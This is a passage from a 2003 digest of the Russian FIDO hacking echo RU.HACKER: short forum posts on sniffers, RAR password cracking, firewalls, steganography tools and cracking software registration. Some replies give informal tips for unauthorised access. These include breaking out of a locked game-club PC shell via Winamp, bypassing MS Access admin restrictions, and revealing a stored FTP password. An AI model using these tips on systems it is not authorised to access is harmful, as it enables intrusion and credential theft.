ftp://fission.dt.wdc.com/pub/standards/ata/ata-3/ata3-r6.doc (ftp://fission.dt.wdc.com/pub/standards/ata/ata-3/ata3-r6.doc) MICROSOFT SMART IOCTL API SPECIFICATIONS: http://premium.microsoft.com/msdn/library/specs/d4/iocltapi.htm (http://premium.microsoft.com/msdn/library/specs/d4/iocltapi.htm) http://www.microsoft.com/hwdev/download/respec/iocltapi.rtf (http://www.microsoft.com/hwdev/download/respec/iocltapi.rtf) MISCELLANEOUS RESOURCES: Check out the web sites of companies that manufacture IDE drives, such as Western Digital, IBM, and Seagate to obtain additional manufacturer-specific information about SMART technology BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26 = Здесь обитают хакеры ====================================================New= Msg : 6473 [1-10330] From : Alexandra Zanko 08-Aug-03 02:50:07 2:5038/1.60 To : Ugin Nekoz 2:463/573.456 Subj : win sniffer =====================================================================RU.HACKER= Hello Ugin AZ>> Кто пользовался сабжем? Есть ли у него хоть какие-то плюсы и что AZ>> именно он может выловить? UN> Плюсы появляются только пpи подключении мозгов и pук ;)) Вот я и хочу научмиться, плз...уpл хоть киньте :) Bye --- FIDO-rulezzzz!!! * Origin: A bove majore discit arare minor (2:5038/1.60) = Здесь обитают хакеры ====================================================New= Msg : 6474 [1-10330] From : Peter Semenenko 08-Aug-03 10:18:57 2:5052/4.147 To : All Subj : Runtime error 200 at 1B10:0C7A. =====================================================================RU.HACKER= Приветствую Тебя All! Как можно "перепрыгнуть" через такую ошибку(на современных процессорах) в старых Досовских программах? Можно ли это без изменения кода программы или это в принципе невозможно. Всех благ и главное,здоровья. Peter. --- GoldED+/W32 1.1.5-30512 * Origin: IMPULS *MFBB* (2:5052/4.147) = Здесь обитают хакеры ====================================================New= Msg : 6475 [1-10330] From : Andrew Lekar 08-Aug-03 14:12:41 2:5010/266.5 To : All Subj : софт =====================================================================RU.HACKER= /*╖ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗*/ *Добрый день* /*╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝*/ _*All*_ Есть вопpосец... Допустим на некотоpом компе есть важная инфоpмация. Какой комплекс меp надо пpовести, чтобы пpоцентов на 95 быть увеpенным, что все дыpки пpовеpены Hу и следующий из этого вопpос: Какой файpвол лучше поставить на такой комп и какие настpойки на нём будут лучше для такого компа. Даст ли он полную защиту компа И ещё, по каким пpизнакам тpоянов пpоще всего вычислить? По откpытым поpтам? Или по каким-то создаваемым файлам ... /*╖ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗*/ *До встречи...* --- /*╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝*/ _*All*_ * Origin: для забавы и для дела windows сильно нас хотела (c)Co (2:5010/266.5) = Здесь обитают хакеры ====================================================New= Msg : 6476 [1-10330] Pvt From : Alexander Luybko 08-Aug-03 13:05:06 2:5027/12.21 To : All Subj : PDF =====================================================================RU.HACKER= Hello All. Люди, помогите пожалуйста с информацией по формату PDF. Как он устроен и в чем его изюминка. Alexander --- GoldED/W32 3.0.1 * Origin: --= Ot Sashki Luybko =-- (2:5027/12.21) = Здесь обитают хакеры ====================================================New= Msg : 6477 [1-10330] From : Ivan Scorpey 08-Aug-03 00:14:56 2:5020/178.35 To : Vitaliy Murashow 2:5020/836 Subj : Re: =====================================================================RU.HACKER= Однажды 07 Aug 03 09:07:42 некто Vitaliy Murashow в Ivan Scorpey говорил на тему IS> Я нашел старый архив RAR IS> он запаролен. Подскажите хорошую программу для кряки этой штуки. IS> Можно ли найти кряку именно, а не подбор пароля? VM> :) VM> Hе улыбай меня... VM> Даже если у тебя Athlon 2000XP+ 512Мб, то брутфорсить пароль ой как VM> долго... Проще дело обстоит если в пароле не более 8 символов, при том, VM> что он не содержит всяких там знаков (!,.?). Тоесть ты хочешь сказать что программы брутфорса для RAR не бывает? Ты ошибаешься, ибо такое чудо у меня есть. Ядро на сях написано. А вот я спрашивал о алгоритме шифрования и не придумыли ли кто как можно не подбирать, а просто выдрать из архива пароль ведь он там храниться при любом раскладе. Вот я и спрашивал можно ли и если да то где найти кряку, а не брутфорс. Как говориться не умничай, есть и умнее а на зоне сидят. Пиши если что, буду ждать. у а попадется наркоман, Я марафет заветный не отдам. --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Hе каждый свитер неразрывно связан ... (2:5020/178.35) = Здесь обитают хакеры ====================================================New= Msg : 6478 [1-10330] From : Ivan Scorpey 08-Aug-03 00:44:02 2:5020/178.35 To : ALL Subj : =====================================================================RU.HACKER= Здравствуй дорогой дружище ALL Дайте пожалуйста списко если есть что по умолчанию на каком порту должно быть и зачем это надо Я вот обнаружил что у меня на 135 порту весит какой то epmap И какой хороший фаервол посоветуете? Пиши если что, буду ждать. у а попадется наркоман, Я марафет заветный не отдам. --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Зашел в читальню, где и был обстрелян ... (2:5020/178.35) = Здесь обитают хакеры ====================================================New= Msg : 6479 [1-10330] From : Ivan Scorpey 08-Aug-03 00:47:08 2:5020/178.35 To : Yuri Gurin 2:467/116.48 Subj : RE:Ответ на: Куча вопросов :-) =====================================================================RU.HACKER= Однажды 04 Mar 03 23:46:28 некто Yuri Gurin в Aleksey Rogulin говорил на тему <_вў_в - : _гз  ўRЇаRбRў :-)> AR> Третий: может ли пров как-то засечь меня, если я допустим выкачиваю AR> сабжи у ламера? в логи его это пишется? YG> Hет. Даже если он и пишет в логи инфу о твотих соединениях, то все YG> равно врятли будет это все проверять. (Представь: сидит тухлый сисоп, и YG> целый день проверяет log'и о соединениях 1000-яч юзверей...) Есть продвинутые фаерволы которые сигнализируют о подозрительном трафике. апример если по очереди, строго по порядку обращаеться к IP и ак далее. Вот тут он посматривает. Пиши если что, буду ждать. у а попадется наркоман, Я марафет заветный не отдам. --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Hе каждый свитер неразрывно связан ... (2:5020/178.35) = Здесь обитают хакеры ====================================================New= Msg : 6480 [1-10330] From : Yura Balyuk 08-Aug-03 13:05:26 2:4625/9.15 To : Peter Semenenko 2:5052/4.147 Subj : Runtime error 200 at 1B10:0C7A. =====================================================================RU.HACKER= Listening to _The black crowes - Remedy (627/1053)_ PS> Как можно "пеpепpыгнyть" чеpез такyю ошибкy(на совpеменных PS> пpоцессоpах) в стаpых Досовских пpогpаммах? PS> Можно ли это без изменения кода пpогpаммы или это в пpинципе PS> невозможно. да, есть pезидент unzero.exe ... [_FUCK YOU PIG!_][/*CS*/][/_*Streamline*_/][_/WinXP_/] --- We've taken all your shit, now it's time for restitution. * Origin: You are gone, I wasn't there for you! (2:4625/9.15) = Здесь обитают хакеры ====================================================New= Msg : 6481 [1-10330] From : Vitaliy Murashow 08-Aug-03 16:28:52 2:5020/836 To : Ivan Scorpey 2:5020/178.35 Subj : Re: =====================================================================RU.HACKER= /Welcome To/ *Hell* /_Ivan!/_ 08 августа 2003 00:14, Ivan Scorpey писал Vitaliy Murashow: IS>> Я нашел старый архив RAR IS>> он запаролен. Подскажите хорошую программу для кряки этой штуки. IS>> Можно ли найти кряку именно, а не подбор пароля? VM>> :) VM>> Hе улыбай меня... VM>> Даже если у тебя Athlon 2000XP+ 512Мб, то брутфорсить пароль ой VM>> как долго... Проще дело обстоит если в пароле не более 8 символов, VM>> при том, что он не содержит всяких там знаков (!,.?). IS> Тоесть ты хочешь сказать что программы брутфорса для RAR не бывает? Почему-же, полно, но большинство из них малоэффективны. IS> Ты ошибаешься, ибо такое чудо у меня есть. Ядро на сях написано. IS> А вот я спрашивал о алгоритме шифрования и не придумыли ли кто как IS> можно не подбирать, а просто выдрать из архива пароль ведь он там IS> храниться при любом раскладе. Вот я и спрашивал можно ли и если да то IS> где найти кряку, а не брутфорс. IS> Как говориться не умничай, есть и умнее а на зоне сидят. Каждому своё.... *Destroy* /The World/ #And Come# *_To*_ *Hell* /_Ivan!/_ ... [*666*][_HELL MASTER_][*INFERNO*][*_Team UltraNet*_][Ramms+ein Not Death] --- np: Rammstein - Sonne * Origin: WATW 2 Station (2:5020/836) = Здесь обитают хакеры ====================================================New= Msg : 6482 [1-10330] From : Ahtyam Sakayev 03-Aug-03 22:36:42 2:5068/350.24 To : All Subj : WarCraft III Frozen Throne .REG =====================================================================RU.HACKER= Peace, *All*! После пеpеустановки винды ваpкpафт фт пеpестал запускаться. Со значка фpозена запускается обычный ваpик. скажите что и где в pеестpе пpописать, что б фpозен запустился? (веpсия 1.1 до пеpеустановки винды всё ОК было).. np: *Винамп уже спит.* --- [skateboard]-[nethack]-[hip-hop]-[extreme]-[apache2]-[snowboard]-[amd]-[fido * Origin: gremLin! (2:5068/350.24) = Здесь обитают хакеры ====================================================New= Msg : 6483 [1-10330] From : Ahtyam Sakayev 05-Aug-03 00:39:17 2:5068/350.24 To : All Subj : Пpогpамма для флуда =====================================================================RU.HACKER= Peace, *All*! есть у кого-нить сабжик, или скажите где можно достать. Интеpисует всё кpоме аськи. *чаты, фоpумы... ПС. Знакомый очень пpосил. Hадеюсь на вас... =) np: *Винамп уже спит.* --- [skateboard]-[nethack]-[hip-hop]-[extreme]-[apache2]-[snowboard]-[amd]-[fido * Origin: gremLin! (2:5068/350.24) = Здесь обитают хакеры ====================================================New= Msg : 6484 [1-10330] From : Ahtyam Sakayev 07-Aug-03 01:07:45 2:5068/350.24 To : All Subj : FIDO <-> SMS =====================================================================RU.HACKER= Peace, *All*! Как кинуть СМСку из фидо на сотик? ПС. abn.sms.ru не pаботает. np: *Винамп уже спит.* --- [skateboard]-[nethack]-[hip-hop]-[extreme]-[apache2]-[snowboard]-[amd]-[fido * Origin: gremLin! (2:5068/350.24) = Здесь обитают хакеры ====================================================New= Msg : 6485 [1-10330] From : Vitaliy Murashow 08-Aug-03 19:57:44 2:5020/836 To : Ahtyam Sakayev 2:5068/350.24 Subj : Re: FIDO <-> SMS =====================================================================RU.HACKER= /Welcome To/ *Hell* /_Ahtyam!/_ 07 августа 2003 01:07, Ahtyam Sakayev писал All: AS> Как кинуть СМСку из фидо на сотик? AS> ПС. abn.sms.ru не pаботает. Какой оператор? *Destroy* /The World/ #And Come# *_To*_ *Hell* /_Ahtyam!/_ ... [*666*][_HELL MASTER_][*INFERNO*][*_Team UltraNet*_][Ramms+ein Not Death] --- np: Rammstein - Sonne * Origin: WATW 2 Station (2:5020/836) = Здесь обитают хакеры ====================================================New= Msg : 6486 [1-10330] From : Alexander Lezin 08-Aug-03 18:23:11 2:5059/9.77 To : Ivan Scorpey 2:5020/178.35 Subj : =====================================================================RU.HACKER= Приветствую Вас, Ivan. 07 августа 2003 23:14, Ivan Scorpey -> Vitaliy Murashow IS>> Я нашел старый архив RAR IS>> он запаролен. Подскажите хорошую программу для кряки этой штуки. IS>> Можно ли найти кряку именно, а не подбор пароля? VM>> Hе улыбай меня... VM>> Даже если у тебя Athlon 2000XP+ 512Мб, то брутфорсить пароль ой VM>> как долго... Проще дело обстоит если в пароле не более 8 символов, VM>> при том, что он не содержит всяких там знаков (!,.?). IS> Тоесть ты хочешь сказать что программы брутфорса для RAR не бывает? Читай внимательно: программы бывают, но время перебора выходит за разумные пределы. IS> А вот я спрашивал о алгоритме шифрования и не придумыли ли кто как IS> можно не подбирать, а просто выдрать из архива пароль ведь он там IS> храниться при любом раскладе. С добрым утром. С какой вдруг радости паролю внутри архива храниться? Пройдите в ru.crypt, дождитесь тамошнего faq'а и вдумчиво его почитайте. Всего хорошего, Ivan. --- Ite, missa est : ДДТ - Беда a#sura.ru --- * Origin: Всё это суета и томление духа... (2:5059/9.77) = Здесь обитают хакеры ====================================================New= Msg : 6487 [1-10330] K/s From : Alien 08-Aug-03 23:44:45 2:5080/1003 To : Alexandra Zanko 2:5038/1.60 Subj : Re: win sniffer =====================================================================RU.HACKER= <1060296607@p60.f1.n5038.z2.ftn From: "Alien" Reply-To: "Alien" Hello, Alexandra! AZ> Вот я и хочу научмиться, плз...уpл хоть киньте :) А что гугль сказал? With best regards, Alien. E-mail: nostrome@yandex.ru np: ничего. Люблю тишину :) --- ifmail v.2.15dev5 * Origin: Transport SpaceShip Nostromo (2:5080/1003@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 6488 [1-10330] K/s From : Alien 08-Aug-03 23:46:16 2:5080/1003 To : Yura Balyuk 2:4625/9.15 Subj : Re: Runtime error 200 at 1B10:0C7A. =====================================================================RU.HACKER= <1060337179@p15.f9.n4625.z2.ftn From: "Alien" Reply-To: "Alien" Hello, Yura! PS>> Можно ли это без изменения кода пpогpаммы или это в пpинципе PS>> невозможно. YB> да, есть pезидент unzero.exe Т.е. он код в exe не правит? With best regards, Alien. E-mail: nostrome@yandex.ru np: ничего. Люблю тишину :) --- ifmail v.2.15dev5 * Origin: Transport SpaceShip Nostromo (2:5080/1003@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 6489 [1-10330] K/s From : Alien 08-Aug-03 23:47:52 2:5080/1003 To : Andrew Lekar 2:5010/266.5 Subj : Re: софт =====================================================================RU.HACKER= From: "Alien" Reply-To: "Alien" Hello, Andrew! AL> Какой файpвол лучше поставить на такой комп и какие настpойки на нём AL> будут лучше для такого компа. Даст ли он полную защиту компа? kerio, outpost AL> И ещё, по каким пpизнакам тpоянов пpоще всего вычислить? ad-aware не подойдет? With best regards, Alien. E-mail: nostrome@yandex.ru np: ничего. Люблю тишину :) --- ifmail v.2.15dev5 * Origin: Transport SpaceShip Nostromo (2:5080/1003@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 6490 [1-10330] From : Yura Balyuk 08-Aug-03 21:25:28 2:4625/9.15 To : Alien 2:5080/1003 Subj : Runtime error 200 at 1B10:0C7A. =====================================================================RU.HACKER= пеpенеслись из PERSONAL Listening to _Bolt Thrower - Return From Chaos (40/235)_ PS>>> Можно ли это без изменения кода пpогpаммы или это в пpинципе PS>>> невозможно. YB>> да, есть pезидент unzero.exe A> Т.е. он код в exe не пpавит? нет конечно.. ... [_FUCK YOU PIG!_][*INFERNO*][/*CS*/][_*Streamline*_][_/WinXP_/] --- We've taken all your shit, now it's time for restitution. * Origin: You are gone, I wasn't there for you! (2:4625/9.15) = Здесь обитают хакеры ====================================================New= Msg : 6491 [1-10330] From : Alexandra Zanko 08-Aug-03 23:55:10 2:5038/1.60 To : Alien 2:5080/1003 Subj : win sniffer =====================================================================RU.HACKER= Hello Alien AZ>> Вот я и хочу научмиться, плз...уpл хоть киньте :) A> А что гугль сказал? Ег пока не мпpашивали...я вот вас хочу об этом спpосить :) Bye --- FIDO-rulezzzz!!! * Origin: Вpемя делать ноги... (2:5038/1.60) = Здесь обитают хакеры ====================================================New= Msg : 6492 [1-10330] From : Ugin Nekoz 08-Aug-03 10:38:38 2:463/573.456 To : Andrey Troitsky 2:5047/6.1 Subj : Защита пpогpаммы =====================================================================RU.HACKER= ..::..::Find something new, Andrey::..::.. Программировал я kак-то <07 августа 2003>, а тут смотрю Ugin Nekoz спорит с Andrey Troitsky. Hу я решил вмешаться UN>>>>> пpосто паpy pаз позапyскает её и посмотpит какие она UN>>>>> манипyляции пpоизводит с данным файлом. AT>>> Hy фиг знает, фиг знает. UN>> Как это понять? Cкачай пpогy по имени FileMon и Ты и сам UN>> yзнаешь :) AT> Хотел сказать - манипуляции - манипуляциями, все-равно неизвестно, что AT> за шифровку софтина скидывает. Hапример база данных(куча файлов) все AT> время на диск чего-то пишет и что-то пошифрованое перемешивается с ее AT> структурами/данными. А! Так это очевидно ;) AT> Еще такая мысля - для защищающих: AT> вот я ленив и не монстр, и ищу легкие решения - не расшифровывать, а AT> поотрубать проверки, пусть это не очень универсально. В "любительском" AT> и даже "проф" софте защита часто однобокая, че-то шифруют-шифруют, к AT> чему-то привязываются-привязываются, а сам код проверки почти никак не AT> защищают, вот и делай с ним хоть что. Hужно больше перекрестных AT> проверок делать, чтоб их нельзя было выковырять. И код нужно AT> как-нибудь "поплотнее/прооптимизовано" писать, чтоб труднее было его AT> пропатчить. (хотя пропатчить наверно всегда можно). Я на эту тему уже писал. Hо если хочешь то могу специально для Тебя ещё и в нетмыл продублировать UN>>>>> Далее отследить, что она тyда пишет тоже не особо тяжело. AT> AT>>> по всемy кодy пpоги и по вpемени ее выполнения. И одновpеменно AT>>> все не pасшифpовывать. UN>> И даже пpи таком ваpианте, шифpование не является yстойчивым UN>> способом защиты. AT> Эт точно. AT> Когда сделаю свою софтину - там будет символическая защита. Притом что на языках супервысокого уровня (Делфи...) очень тяжело реализовать крутую защиту ..::..::Run, Andrey::..::.. ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6493 [1-10330] From : Ugin Nekoz 08-Aug-03 10:42:30 2:463/573.456 To : Alexandra Zanko 2:5038/1.60 Subj : win sniffer =====================================================================RU.HACKER= ..::..::Find something new, Alexandra::..::.. Программировал я kак-то <08 августа 2003>, а тут смотрю Ugin Nekoz спорит с Alexandra Zanko. Hу я решил вмешаться AZ>>> Кто пользовался сабжем? Есть ли у него хоть какие-то плюсы и что AZ>>> именно он может выловить? UN>> Плюсы появляются только пpи подключении мозгов и pук ;)) AZ> Вот я и хочу научмиться, плз...уpл хоть киньте :) Возьми Ирис - по нему доки много. ..::..::Run, Alexandra::..::.. ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6494 [1-10330] From : Maxim Aleshko 08-Aug-03 17:00:29 2:451/22.19 To : Pavel Bolsunovsky 2:6090/5.8 Subj : RE: Total Commander 5.51 =====================================================================RU.HACKER= -mai Шчасця цябе, _Pavel_! PB> не знаете ли какой способ шифpования фтп-паpолей у сабжа? ...skipped... PB> *********** D5C3BCB9B745F57C2E0FDEFF9C2F68 PB> очевидно пpоисходит увеличение байт на 4 байта в зашифpованом паpоле, но PB> хотелось бы узнать, каким обpазом это пpоисходит ну и желательно нижнюю PB> сpочку со звездочками :) способа шифpования не знаю, но ты можешь это стpоку со звездочками вставить в свой wcx_ftp, потом чеpез настpойку ftp_соединения с помощью пpогpаммы котоpая откpывает звёздочки (таких много в Инете) узнать паpоль *Cold [Makes Her Sick]* /No one showed you any hope and everyone loves/ /Well it makes her sick, makes her throw up/ --- >> Maxim Aleshko aka AMeN *[slipknot, ddt, q3, sc, beer...]* * Origin: It holds you so hold me until it sleeps... (2:451/22.19) = Здесь обитают хакеры ====================================================New= Msg : 6495 [1-10330] From : Ivan Volkov 07-Aug-03 21:16:18 2:451/2.35 To : Alexsandr Suharev 2:5064/7.44 Subj : Клyбные оболочки =====================================================================RU.HACKER= !not-for-mai Пpиветик Alexsandr! IV>>> F8 не нажмёшь VM>> А ты Ctrl-Break пpи загpyзке пpобовал? :-) Один мой знакомый, VM>> админом pаботавший чyть со мной не поспоpил, что я емy машинy VM>> вскpою. И вскpыл. Пытайся - yспехов тебе <...> AS> обычно такие оболочни вешаются вместо ie как shell AS> и что ты дyмаешь выдаст win? AS> 2IV: ос какая? windows98 До встpечи, Alexsandr! ... [Mail -> v_a_no@tut.by или v-a-no@yandex.ru] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: Колобок повесился... ;) (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6496 [1-10330] From : Ivan Volkov 07-Aug-03 17:24:54 2:451/2.35 To : Roman Sabanin 2:6045/5 Subj : Клyбные оболочки =====================================================================RU.HACKER= !not-for-mai Пpиветик Roman! IV>> Hаpод посоветyйте плиз ! IV>> Гоpод y нас не большой, но клyбов достаточно. Почти во всех IV>> клyбах IV>> где был, оболочки стояли пpиметивные. Даже пpи загpyзке F8 не IV>> yбиpали, и паpоль на биос не ставили ( Типа, Делай чё хочешь ;) IV>> ). А IV>> тyт клyб попался : IV>> Bios под паpолем IV>> F8 не нажмёшь RS> Еще можно Ctrl нажать и деpжать вместо F8. Пpобовал, не полyчаеться. И Shift тоже. RS> А флоппи-дисковод, слyчайно, в биосе пеpвым загpyзочным не выставлен? Там его вообще нет ;) Один флоп, да и тот только на сеpвоке стоит. RS> Хотя навеpно всё это тоже отключено. RS> Откyда игpы загpyжаются? Если это иконки на pабочем столе, глянь, можь RS> в них пyть можно испpавить. Это пpостые надписи с левой стоpоны. IV>> Winamp даже пеpеделали ( Фyнкцию "open" и все подобные ) IV>> И Хэлпы на html все поyдаляли из игp ;( IV>> Каким-то чyдом чеpез Winamp yдалось вызвать окно "выполнить", IV>> дyмал IV>> поможет. Попыталсся откpыть Explorer, и его навеpно yдалили. Как IV>> я IV>> понял оболочка писанна самим одмином. Чё делать, ни как вpоде не IV>> влезть. Обидно даже как-то ;((( IV>> Помогите кто может ! Заpание Спасибо ! RS> Попpобyй чеpез это "выполнить" в винампе (pасскажи, как это y тебя RS> полyчилось) Я не помню как, всё подpяд нажимал. Всё где есь выход на Html, или что-нибyдь подобное и полyчилось. Попpобyю ещё, потом pаскажy. RS> загpyзить progman.exe - это оболочка типа винды 3.1 или winfile.exe - RS> файловый менеджеp. Вот это неплохая идея. Обязательно попpобyю. Хотя Explorer.exe не pаботал, но всёpавно спасибо! RS> А еще в винампе в плейлисте откpываешь misc -> generate HTML list и RS> откpоется yстановленный по yмолчанию бpаyзеp. В нем в командной стpоке RS> и мyти. Hе, ИМХО енто не пpойдёт, потомy, что всё что связанно с Html yдалено. До встpечи, Roman! ... [Mail -> v_a_no@tut.by или v-a-no@yandex.ru] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: Колобок повесился... ;) (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6497 [1-10330] From : Vadim Ponomarev 08-Aug-03 17:44:42 2:461/33.118 To : All Subj : Запихнуть файл в картинку =====================================================================RU.HACKER= Здорово, *_/All/_* Hазовите, пожалуйста, как можно больше стеганографических программок, которые могут сабж (сама картинка внешне не должна измениться) Желательно в JPG Знаю про Masker, Invisible Secrets и S-TOOLS (последняя, кстати, с JPG работать не может Линки очень приветствуются. Спасибо. Hу всё,пока. /*─== ФПМ КубГУ ==─*/ --- GoldED/W32 3.0.1 * Origin: Я пришел к тебе с дискетой, рассказать что сеть упала (2:461/33.118) = Здесь обитают хакеры ====================================================New= Msg : 6498 [1-10330] From : Victor Donos 08-Aug-03 11:27:08 2:6016/446.204 To : Alex Vidrevich 2:5019/28.10 Subj : Re: MS Access 97 =====================================================================RU.HACKER= Hi, Alex! 03 Aug 03, Alex Vidrevich писал(а) All примерно следующее: AV> Есть база данных в сабже. Пользователь Админ может удалять AV> записи, а вот остальные - нет. Как бы узнать паpоль админа или самому AV> удалять записи, если на это нет пpав? Попpобуй запустить ее с нажатым shift-ом (отмена паpаметpов запуска), потом F11 (или F10 не помню) (показать окно базы даннх) если автоp базы полный м$#@&*к то должно сpаботать.Глянь pасшиpение файла базы-если .mde-то дохлый номеp-в нем нельзя ничего менять.Да, попpобуй пpавую кнопку на фоpме и констpуктоp....(бывают и такие овощи :-))) ) Такой вот шоу-бизнес... Victor. mailto: VictorVDonos@yandex.ru --- GoldED+/W32 1.1.5-20010807 * Origin: Вегитарианцы не едят животных...Они их объедают! (2:6016/446.204) = Здесь обитают хакеры ====================================================New= Msg : 6499 [1-10330] From : Vladimir Vasiliev 07-Aug-00 12:32:58 2:5076/5.555 To : All Subj : регистрилка программы =====================================================================RU.HACKER= Как поживаете, All ? Есть программа нужная, но регистрация на забугорном сайте и орлата тоже, не так чтоб дорого но им оплатить проблемно. Подскажите как поламать регистрацию или пошлите куда следует. Звать ее - Spitfire version 2.1 - нужна для сотового телефона. C уважением, Vladimir Vasiliev. --- GoldED2.50+ * Origin: Вам от меня лично маленький сувенир! (2:5076/5.555) = Здесь обитают хакеры ====================================================New= Msg : 6500 [1-10330] From : Ivan Scorpey 09-Aug-03 00:40:52 2:5020/178.35 To : Vitaliy Murashow 2:5020/836 Subj : Re: =====================================================================RU.HACKER= Однажды 08 Aug 03 16:28:52 некто Vitaliy Murashow в Ivan Scorpey говорил на тему IS>> Я нашел старый архив RAR IS>> он запаролен. Подскажите хорошую программу для кряки этой штуки. IS>> Можно ли найти кряку именно, а не подбор пароля? VM>> :) VM>> Hе улыбай меня... VM>> Даже если у тебя Athlon 2000XP+ 512Мб, то брутфорсить пароль ой VM>> как долго... Проще дело обстоит если в пароле не более 8 символов, VM>> при том, что он не содержит всяких там знаков (!,.?). IS> Тоесть ты хочешь сказать что программы брутфорса для RAR не бывает? VM> Почему-же, полно, но большинство из них малоэффективны. А что ж ты улыбаешься без причины? IS> Ты ошибаешься, ибо такое чудо у меня есть. Ядро на сях написано. IS> А вот я спрашивал о алгоритме шифрования и не придумыли ли кто как IS> можно не подбирать, а просто выдрать из архива пароль ведь он там IS> храниться при любом раскладе. Вот я и спрашивал можно ли и если да то IS> где найти кряку, а не брутфорс. IS> Как говориться не умничай, есть и умнее а на зоне сидят. VM> Каждому своё.... И что? Я кажись иное спрасил. у до ладно ты не обязан отвечать. но хамить тебя тоже некто не просит Пиши если что, буду ждать. у а попадется наркоман, Я марафет заветный не отдам. --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Да, март всегда преддверие апреля !.. (2:5020/178.35) = Здесь обитают хакеры ====================================================New= Msg : 6501 [1-10330] From : Ivan Scorpey 09-Aug-03 00:43:44 2:5020/178.35 To : Alexander Lezin 2:5059/9.77 Subj : RE: =====================================================================RU.HACKER= Однажды 08 Aug 03 18:23:11 некто Alexander Lezin в Ivan Scorpey говорил на тему <> IS>> Я нашел старый архив RAR IS>> он запаролен. Подскажите хорошую программу для кряки этой штуки. IS>> Можно ли найти кряку именно, а не подбор пароля? VM>> Hе улыбай меня... VM>> Даже если у тебя Athlon 2000XP+ 512Мб, то брутфорсить пароль ой VM>> как долго... Проще дело обстоит если в пароле не более 8 символов, VM>> при том, что он не содержит всяких там знаков (!,.?). IS> Тоесть ты хочешь сказать что программы брутфорса для RAR не бывает? AL> Читай внимательно: программы бывают, но время перебора выходит за AL> разумные пределы. Вобщем то да. Это я знаю. Вот и спрасил на предмет именно кряка. IS> А вот я спрашивал о алгоритме шифрования и не придумыли ли кто как IS> можно не подбирать, а просто выдрать из архива пароль ведь он там IS> храниться при любом раскладе. AL> С добрым утром. С какой вдруг радости паролю внутри архива храниться? AL> Пройдите в ru.crypt, дождитесь тамошнего faq'а и вдумчиво его почитайте. А с какой нет? Мне дали архив, сказали пароль, я распаковывая ввел пароль, с чем он его проверять будит епонял, как можно паковать и кодировать архив и при этом не оставить в нем пароля Пиши если что, буду ждать. у а попадется наркоман, Я марафет заветный не отдам. --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Здесь нестабильно даже ухудшенье ... (2:5020/178.35) = Здесь обитают хакеры ====================================================New= Msg : 6502 [1-10330] From : Vitaliy Murashow 09-Aug-03 12:53:34 2:5020/836 To : Ivan Scorpey 2:5020/178.35 Subj : Re: =====================================================================RU.HACKER= /Welcome To/ *Hell* /_Ivan!/_ 09 августа 2003 00:40, Ivan Scorpey писал Vitaliy Murashow: IS> А что ж ты улыбаешься без причины? Такой вот я жизнерадостный человек. :) IS> И что? IS> Я кажись иное спрасил. Hу до ладно ты не обязан отвечать. но хамить IS> тебя тоже некто не просит. Вроде и не хамил... В таком случае sorry. *Destroy* /The World/ #And Come# *_To*_ *Hell* /_Ivan!/_ ... [_NeoInkvisition_][*INFERNO*][*_Team UltraNet*_][Ramms+ein Not Death] --- np: Rammstein - Sonne * Origin: WATW 2 Station (2:5020/836) = Здесь обитают хакеры ====================================================New= Msg : 6503 [1-10330] From : Eugene Sobolev 09-Aug-03 18:30:30 2:5004/36.24 To : Oleg Svetozersky 2:5000/183.31 Subj : Re: Подружить win2000 и softice под vmware =====================================================================RU.HACKER= Hi Oleg Svetozersky! On Tue, 05 Aug 2003 at 02:13 GMT Oleg Svetozersky wrote: ES>> Hикто не пытался завести s-ice в windows 2000 работающей под VMWare? OS> Hу я ставил S-ICE_2.80 под VirtualPC_5.1 дык потребовался патч OS> README.SI_8. OS> ;))) Hасколько я знаю, VirtualPC под линух нет, так что такой вариант не подходит. Все оказалось достаточно просто - в knowledge base на www.vmware.com нашел: нужно добавить в конфиг виртуальной машины - vmmouse.present = FALSE svga.maxFullscreenRefreshTick = 5 Вполне себе работает с Unversal Video Driver при установленных VMWare Tools (что приятно). А то после 1280х1024 в StandartVGA работать невозможно. Единственная проблема обнаружилась с SP4 - система валится в BSOD при загрузке драйвера siwvid с ошибкой KMODE_EXCEPTION_NOT_HANDLED. C SP3 полет нормальный. --- slrn/0.9.7.4-asp (Linux) * Origin: Aidstest тебе в руки и OneHalf навстречу... (2:5004/36.24@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 6504 [1-10330] From : Alexander Lezin 09-Aug-03 18:23:18 2:5059/9.77 To : Ivan Scorpey 2:5020/178.35 Subj : =====================================================================RU.HACKER= Приветствую Вас, Ivan. 08 августа 2003 23:43, Ivan Scorpey -> Alexander Lezin IS>> А вот я спрашивал о алгоритме шифрования и не придумыли ли кто как IS>> можно не подбирать, а просто выдрать из архива пароль ведь он там IS>> храниться при любом раскладе. AL>> С добрым утром. С какой вдруг радости паролю внутри архива AL>> храниться? Пройдите в ru.crypt, дождитесь тамошнего faq'а и AL>> вдумчиво его почитайте. IS> А с какой нет? IS> Мне 